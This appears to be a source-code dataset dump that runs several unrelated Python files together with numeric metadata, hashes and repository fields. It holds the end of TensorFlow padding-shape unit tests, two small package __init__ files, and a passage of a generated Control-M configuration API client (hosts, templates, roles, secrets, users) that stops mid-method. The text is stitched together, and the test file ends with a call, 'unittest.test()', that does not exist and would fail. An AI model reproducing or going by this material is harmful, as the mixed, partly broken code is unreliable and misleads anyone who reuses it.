Kx.shape) def test3d_complex(self): shape = (5, 2, 8, 10, 10) x = tf.complex(tf.random.normal(shape), tf.random.normal(shape)) padding = [2, 2, 4, 4, 1, 1] op = Pad3d(padding=padding, mode='symmetric', channel_last=False) Kx = op(x) # manually construct new shape new_shape = list(x.shape) new_shape[-1] += padding[0] + padding[1] new_shape[-2] += padding[2] + padding[3] new_shape[-3] += padding[4] + padding[5] new_shape = tuple(new_shape) self.assertTrue(new_shape == Kx.shape) def test3d_channel_last(self): shape = (5, 8, 10, 10, 2) x = tf.random.normal(shape) padding = [2, 2, 4, 4, 1, 2] op = Pad3d(padding=padding, mode='symmetric', channel_last=True) Kx = op(x) # manually construct new shape new_shape = list(x.shape) new_shape[-2] += padding[0] + padding[1] new_shape[-3] += padding[2] + padding[3] new_shape[-4] += padding[4] + padding[5] new_shape = tuple(new_shape) self.assertTrue(new_shape == Kx.shape) def test2d_transpose(self): shape = (5, 2, 10, 10) x = tf.random.normal(shape) padding = [2, 2, 4, 4] op = Pad2dTranspose(padding=padding, mode='symmetric', channel_last=False) Kx = op(x) # manually construct new shape new_shape = list(x.shape) new_shape[-1] -= padding[0] + padding[1] new_shape[-2] -= padding[2] + padding[3] new_shape = tuple(new_shape) self.assertTrue(new_shape == Kx.shape) def test2d_complex_transpose(self): shape = (5, 2, 10, 10) x = tf.complex(tf.random.normal(shape), tf.random.normal(shape)) padding = [2, 2, 4, 4] op = Pad2dTranspose(padding=padding, mode='symmetric', channel_last=False) Kx = op(x) # manually construct new shape new_shape = list(x.shape) new_shape[-1] -= padding[0] + padding[1] new_shape[-2] -= padding[2] + padding[3] new_shape = tuple(new_shape) self.assertTrue(new_shape == Kx.shape) def test2d_channel_last_transpose(self): shape = (5, 10, 10, 2) x = tf.random.normal(shape) padding = [2, 2, 4, 4] op = Pad2dTranspose(padding=padding, mode='symmetric', channel_last=True) Kx = op(x) # manually construct new shape new_shape = 
list(x.shape) new_shape[-2] -= padding[0] + padding[1] new_shape[-3] -= padding[2] + padding[3] new_shape = tuple(new_shape) self.assertTrue(new_shape == Kx.shape) def test3d_transpose(self): shape = (5, 2, 8, 10, 10) x = tf.random.normal(shape) padding = [2, 2, 4, 4, 1, 1] op = Pad3dTranspose(padding=padding, mode='symmetric', channel_last=False) Kx = op(x) # manually construct new shape new_shape = list(x.shape) new_shape[-1] -= padding[0] + padding[1] new_shape[-2] -= padding[2] + padding[3] new_shape[-3] -= padding[4] + padding[5] new_shape = tuple(new_shape) self.assertTrue(new_shape == Kx.shape) def test3d_complex_transpose(self): shape = (5, 2, 8, 10, 10) x = tf.complex(tf.random.normal(shape), tf.random.normal(shape)) padding = [2, 2, 4, 4, 1, 1] op = Pad3dTranspose(padding=padding, mode='symmetric', channel_last=False) Kx = op(x) # manually construct new shape new_shape = list(x.shape) new_shape[-1] -= padding[0] + padding[1] new_shape[-2] -= padding[2] + padding[3] new_shape[-3] -= padding[4] + padding[5] new_shape = tuple(new_shape) self.assertTrue(new_shape == Kx.shape) def test3d_channel_last_transpose(self): shape = (5, 8, 10, 10, 2) x = tf.random.normal(shape) padding = [2, 2, 4, 4, 1, 2] op = Pad3dTranspose(padding=padding, mode='symmetric', channel_last=True) Kx = op(x) # manually construct new shape new_shape = list(x.shape) new_shape[-2] -= padding[0] + padding[1] new_shape[-3] -= padding[2] + padding[3] new_shape[-4] -= padding[4] + padding[5] new_shape = tuple(new_shape) self.assertTrue(new_shape == Kx.shape) if __name__ == "__main__": unittest.test()
35.778462
208
0.590815
1,646
11,628
4.008505
0.051033
0.128524
0.055168
0.046075
0.975902
0.975144
0.972416
0.972416
0.969536
0.966808
0
0.043799
0.265652
11,628
325
209
35.778462
0.728891
0.03397
0
0.818182
0
0
0.01034
0
0
0
0
0
0.049587
1
0.090909
false
0
0.012397
0
0.140496
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
1cc13d92f793bce6534055d364bb862b21fdaf19
197
py
Python
hospital_logfile_analyzer/parsers/__init__.py
pavlodyban/cloverleaf_parser
a65b68d4116d219793e5c19ab4ac6e9125d388eb
[ "MIT" ]
5
2020-02-03T10:19:47.000Z
2020-12-25T14:04:25.000Z
hospital_logfile_analyzer/parsers/__init__.py
pavlodyban/cloverleaf_parser
a65b68d4116d219793e5c19ab4ac6e9125d388eb
[ "MIT" ]
2
2020-06-15T19:52:10.000Z
2020-06-23T18:56:54.000Z
hospital_logfile_analyzer/parsers/__init__.py
pavlodyban/cloverleaf_parser
a65b68d4116d219793e5c19ab4ac6e9125d388eb
[ "MIT" ]
2
2020-06-15T19:27:18.000Z
2020-10-29T10:33:56.000Z
# classes from .logfile_parser import LogfileParser from .cloverleaf_parser import CloverleafLogfileParser # convenience functions from .cloverleaf_parser import parse, verify_file, write_to_json
28.142857
64
0.862944
23
197
7.130435
0.695652
0.219512
0.243902
0.317073
0
0
0
0
0
0
0
0
0.101523
197
6
65
32.833333
0.926554
0.147208
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
8
1cc7435ed665fbd8e06191c2492f54edf68d794a
48
py
Python
BBNX/HCLib/__init__.py
nikitakuklev/ADRNX
b8a07f50788bbbfd36a8f956ca70cf8ed2bd95ee
[ "Apache-2.0" ]
null
null
null
BBNX/HCLib/__init__.py
nikitakuklev/ADRNX
b8a07f50788bbbfd36a8f956ca70cf8ed2bd95ee
[ "Apache-2.0" ]
null
null
null
BBNX/HCLib/__init__.py
nikitakuklev/ADRNX
b8a07f50788bbbfd36a8f956ca70cf8ed2bd95ee
[ "Apache-2.0" ]
null
null
null
from . import HeaterController from . import PID
24
30
0.8125
6
48
6.5
0.666667
0.512821
0
0
0
0
0
0
0
0
0
0
0.145833
48
2
31
24
0.95122
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
1cd68982e13d887bccb84a40137f38fe7f262fd4
278,489
py
Python
ctm_saas_client/api/config_api.py
tadinve/ctm_python_client
de44e5012214ec42bb99b7f9b4ebc5394cd14328
[ "BSD-3-Clause" ]
null
null
null
ctm_saas_client/api/config_api.py
tadinve/ctm_python_client
de44e5012214ec42bb99b7f9b4ebc5394cd14328
[ "BSD-3-Clause" ]
null
null
null
ctm_saas_client/api/config_api.py
tadinve/ctm_python_client
de44e5012214ec42bb99b7f9b4ebc5394cd14328
[ "BSD-3-Clause" ]
null
null
null
# coding: utf-8 """ Control-M Services Provides access to BMC Control-M Services # noqa: E501 OpenAPI spec version: 9.20.30 Contact: customer_support@bmc.com Generated by: https://github.com/swagger-api/swagger-codegen.git """ from __future__ import absolute_import import re # noqa: F401 # python 2 and python 3 compatibility library import six from ctm_saas_client.api_client import ApiClient class ConfigApi(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. Ref: https://github.com/swagger-api/swagger-codegen """ def __init__(self, api_client=None): if api_client is None: api_client = ApiClient() self.api_client = api_client def add_host_to_hostgroup(self, server, hostgroup, agent, **kwargs): # noqa: E501 """add agent to hostgroup # noqa: E501 Add an agent to hostgroup. Create the the hostgroup if it does not exist. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_host_to_hostgroup(server, hostgroup, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the hostgroup belongs to. (required) :param str hostgroup: The hostgroup name (required) :param AgentInHostgroup agent: The hostname of the new agent (required) :return: AgentsInGroupSuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.add_host_to_hostgroup_with_http_info(server, hostgroup, agent, **kwargs) # noqa: E501 else: (data) = self.add_host_to_hostgroup_with_http_info(server, hostgroup, agent, **kwargs) # noqa: E501 return data def add_host_to_hostgroup_with_http_info(self, server, hostgroup, agent, **kwargs): # noqa: E501 """add agent to hostgroup # noqa: E501 Add an agent to hostgroup. Create the the hostgroup if it does not exist. 
# noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_host_to_hostgroup_with_http_info(server, hostgroup, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the hostgroup belongs to. (required) :param str hostgroup: The hostgroup name (required) :param AgentInHostgroup agent: The hostname of the new agent (required) :return: AgentsInGroupSuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'hostgroup', 'agent'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method add_host_to_hostgroup" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `add_host_to_hostgroup`") # noqa: E501 # verify the required parameter 'hostgroup' is set if self.api_client.client_side_validation and ('hostgroup' not in params or params['hostgroup'] is None): # noqa: E501 raise ValueError("Missing the required parameter `hostgroup` when calling `add_host_to_hostgroup`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `add_host_to_hostgroup`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'hostgroup' in params: 
path_params['hostgroup'] = params['hostgroup'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'agent' in params: body_params = params['agent'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/hostgroup/{hostgroup}/agent', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='AgentsInGroupSuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def add_pgp_template(self, server, agent, template_name, pgp_template_data, **kwargs): # noqa: E501 """Add PGP Template # noqa: E501 Add PGP Template # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_pgp_template(server, agent, template_name, pgp_template_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str template_name: The PGP Template Name (required) :param PgpTemplateData pgp_template_data: PGP Template Data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. 
""" kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.add_pgp_template_with_http_info(server, agent, template_name, pgp_template_data, **kwargs) # noqa: E501 else: (data) = self.add_pgp_template_with_http_info(server, agent, template_name, pgp_template_data, **kwargs) # noqa: E501 return data def add_pgp_template_with_http_info(self, server, agent, template_name, pgp_template_data, **kwargs): # noqa: E501 """Add PGP Template # noqa: E501 Add PGP Template # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_pgp_template_with_http_info(server, agent, template_name, pgp_template_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str template_name: The PGP Template Name (required) :param PgpTemplateData pgp_template_data: PGP Template Data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. 
""" all_params = ['server', 'agent', 'template_name', 'pgp_template_data'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method add_pgp_template" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `add_pgp_template`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `add_pgp_template`") # noqa: E501 # verify the required parameter 'template_name' is set if self.api_client.client_side_validation and ('template_name' not in params or params['template_name'] is None): # noqa: E501 raise ValueError("Missing the required parameter `template_name` when calling `add_pgp_template`") # noqa: E501 # verify the required parameter 'pgp_template_data' is set if self.api_client.client_side_validation and ('pgp_template_data' not in params or params['pgp_template_data'] is None): # noqa: E501 raise ValueError("Missing the required parameter `pgp_template_data` when calling `add_pgp_template`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 if 'template_name' in params: path_params['templateName'] = params['template_name'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 
'pgp_template_data' in params: body_params = params['pgp_template_data'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/mft/pgptemplate/{templateName}', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def add_role(self, role_file, **kwargs): # noqa: E501 """Add Authorization Role # noqa: E501 Add Authorization Role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_role(role_file, async_req=True) >>> result = thread.get() :param async_req bool :param file role_file: File with contenet of Role Data. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.add_role_with_http_info(role_file, **kwargs) # noqa: E501 else: (data) = self.add_role_with_http_info(role_file, **kwargs) # noqa: E501 return data def add_role_with_http_info(self, role_file, **kwargs): # noqa: E501 """Add Authorization Role # noqa: E501 Add Authorization Role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_role_with_http_info(role_file, async_req=True) >>> result = thread.get() :param async_req bool :param file role_file: File with contenet of Role Data. 
(required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['role_file'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method add_role" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'role_file' is set if self.api_client.client_side_validation and ('role_file' not in params or params['role_file'] is None): # noqa: E501 raise ValueError("Missing the required parameter `role_file` when calling `add_role`") # noqa: E501 collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} if 'role_file' in params: local_var_files['roleFile'] = params['role_file'] # noqa: E501 body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['multipart/form-data']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/role', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def add_role_to_ldap_group(self, ldapgroup, role, **kwargs): # noqa: E501 """Add a role to LDAP group # noqa: E501 Add a role to LDAP group so any user 
belong to the LDAP group will get all permissions defined in the role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_role_to_ldap_group(ldapgroup, role, async_req=True) >>> result = thread.get() :param async_req bool :param str ldapgroup: Name of LDAP group (required) :param str role: Name of role (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.add_role_to_ldap_group_with_http_info(ldapgroup, role, **kwargs) # noqa: E501 else: (data) = self.add_role_to_ldap_group_with_http_info(ldapgroup, role, **kwargs) # noqa: E501 return data def add_role_to_ldap_group_with_http_info(self, ldapgroup, role, **kwargs): # noqa: E501 """Add a role to LDAP group # noqa: E501 Add a role to LDAP group so any user belong to the LDAP group will get all permissions defined in the role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_role_to_ldap_group_with_http_info(ldapgroup, role, async_req=True) >>> result = thread.get() :param async_req bool :param str ldapgroup: Name of LDAP group (required) :param str role: Name of role (required) :return: SuccessData If the method is called asynchronously, returns the request thread. 
""" all_params = ['ldapgroup', 'role'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method add_role_to_ldap_group" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'ldapgroup' is set if self.api_client.client_side_validation and ('ldapgroup' not in params or params['ldapgroup'] is None): # noqa: E501 raise ValueError("Missing the required parameter `ldapgroup` when calling `add_role_to_ldap_group`") # noqa: E501 # verify the required parameter 'role' is set if self.api_client.client_side_validation and ('role' not in params or params['role'] is None): # noqa: E501 raise ValueError("Missing the required parameter `role` when calling `add_role_to_ldap_group`") # noqa: E501 collection_formats = {} path_params = {} if 'ldapgroup' in params: path_params['ldapgroup'] = params['ldapgroup'] # noqa: E501 if 'role' in params: path_params['role'] = params['role'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/ldap/{ldapgroup}/role/{role}', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def 
add_secret(self, name_value, **kwargs): # noqa: E501 """Add a new secret # noqa: E501 Add a new secret to the secrets vault. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_secret(name_value, async_req=True) >>> result = thread.get() :param async_req bool :param SecretKeyValue name_value: The new secret value (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.add_secret_with_http_info(name_value, **kwargs) # noqa: E501 else: (data) = self.add_secret_with_http_info(name_value, **kwargs) # noqa: E501 return data def add_secret_with_http_info(self, name_value, **kwargs): # noqa: E501 """Add a new secret # noqa: E501 Add a new secret to the secrets vault. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_secret_with_http_info(name_value, async_req=True) >>> result = thread.get() :param async_req bool :param SecretKeyValue name_value: The new secret value (required) :return: SuccessData If the method is called asynchronously, returns the request thread. 
""" all_params = ['name_value'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method add_secret" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'name_value' is set if self.api_client.client_side_validation and ('name_value' not in params or params['name_value'] is None): # noqa: E501 raise ValueError("Missing the required parameter `name_value` when calling `add_secret`") # noqa: E501 collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'name_value' in params: body_params = params['name_value'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/secret', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def add_user(self, user_file, **kwargs): # noqa: E501 """Add user # noqa: E501 Add user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_user(user_file, async_req=True) >>> result = thread.get() :param async_req bool :param file user_file: File with contenet of user data. 
(required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.add_user_with_http_info(user_file, **kwargs) # noqa: E501 else: (data) = self.add_user_with_http_info(user_file, **kwargs) # noqa: E501 return data def add_user_with_http_info(self, user_file, **kwargs): # noqa: E501 """Add user # noqa: E501 Add user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_user_with_http_info(user_file, async_req=True) >>> result = thread.get() :param async_req bool :param file user_file: File with contenet of user data. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['user_file'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method add_user" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'user_file' is set if self.api_client.client_side_validation and ('user_file' not in params or params['user_file'] is None): # noqa: E501 raise ValueError("Missing the required parameter `user_file` when calling `add_user`") # noqa: E501 collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} if 'user_file' in params: local_var_files['userFile'] = params['user_file'] # noqa: E501 body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 
['multipart/form-data']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/user', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def add_zos_template(self, server, agent, template_name, zos_template_data, **kwargs): # noqa: E501 """Add z/OS Template # noqa: E501 Add z/OS Template # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_zos_template(server, agent, template_name, zos_template_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str template_name: The z/OS Template Name (required) :param ZosTemplateData zos_template_data: z/OS Template Data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.add_zos_template_with_http_info(server, agent, template_name, zos_template_data, **kwargs) # noqa: E501 else: (data) = self.add_zos_template_with_http_info(server, agent, template_name, zos_template_data, **kwargs) # noqa: E501 return data def add_zos_template_with_http_info(self, server, agent, template_name, zos_template_data, **kwargs): # noqa: E501 """Add z/OS Template # noqa: E501 Add z/OS Template # noqa: E501 This method makes a synchronous HTTP request by default. 
To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_zos_template_with_http_info(server, agent, template_name, zos_template_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str template_name: The z/OS Template Name (required) :param ZosTemplateData zos_template_data: z/OS Template Data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'template_name', 'zos_template_data'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method add_zos_template" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `add_zos_template`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `add_zos_template`") # noqa: E501 # verify the required parameter 'template_name' is set if self.api_client.client_side_validation and ('template_name' not in params or params['template_name'] is None): # noqa: E501 raise ValueError("Missing the required parameter `template_name` when calling `add_zos_template`") # noqa: E501 # verify the required parameter 'zos_template_data' is set if self.api_client.client_side_validation and ('zos_template_data' not in params or params['zos_template_data'] is None): 
# noqa: E501 raise ValueError("Missing the required parameter `zos_template_data` when calling `add_zos_template`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 if 'template_name' in params: path_params['templateName'] = params['template_name'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'zos_template_data' in params: body_params = params['zos_template_data'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/mft/zostemplate/{templateName}', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def authorize_mft_ssh_cluster(self, server, agent, cluster_name, hostname_port_list, **kwargs): # noqa: E501 """Authorize SSH Cluster # noqa: E501 Authorize SSH Cluster # noqa: E501 This method makes a synchronous HTTP request by default. 
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.authorize_mft_ssh_cluster(server, agent, cluster_name, hostname_port_list, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server (required)
        :param str agent: The Agent (required)
        :param str cluster_name: Ssh Cluster Name (required)
        :param ClusterAuthorizationData hostname_port_list: File with content of hostnames and ports (required)
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Return only the deserialized body; callers wanting the full HTTP
        # response use authorize_mft_ssh_cluster_with_http_info directly.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.authorize_mft_ssh_cluster_with_http_info(server, agent, cluster_name, hostname_port_list, **kwargs)  # noqa: E501
        else:
            (data) = self.authorize_mft_ssh_cluster_with_http_info(server, agent, cluster_name, hostname_port_list, **kwargs)  # noqa: E501
            return data

    def authorize_mft_ssh_cluster_with_http_info(self, server, agent, cluster_name, hostname_port_list, **kwargs):  # noqa: E501
        """Authorize SSH Cluster  # noqa: E501

        Authorize SSH Cluster  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.authorize_mft_ssh_cluster_with_http_info(server, agent, cluster_name, hostname_port_list, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server (required)
        :param str agent: The Agent (required)
        :param str cluster_name: Ssh Cluster Name (required)
        :param ClusterAuthorizationData hostname_port_list: File with content of hostnames and ports (required)
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['server', 'agent', 'cluster_name', 'hostname_port_list']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # locals() snapshot of the explicit arguments plus `kwargs`;
        # recognized keyword arguments are merged in and `kwargs` dropped.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method authorize_mft_ssh_cluster" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'server' is set
        if self.api_client.client_side_validation and ('server' not in params or params['server'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `server` when calling `authorize_mft_ssh_cluster`")  # noqa: E501
        # verify the required parameter 'agent' is set
        if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `agent` when calling `authorize_mft_ssh_cluster`")  # noqa: E501
        # verify the required parameter 'cluster_name' is set
        if self.api_client.client_side_validation and ('cluster_name' not in params or params['cluster_name'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `cluster_name` when calling `authorize_mft_ssh_cluster`")  # noqa: E501
        # verify the required parameter 'hostname_port_list' is set
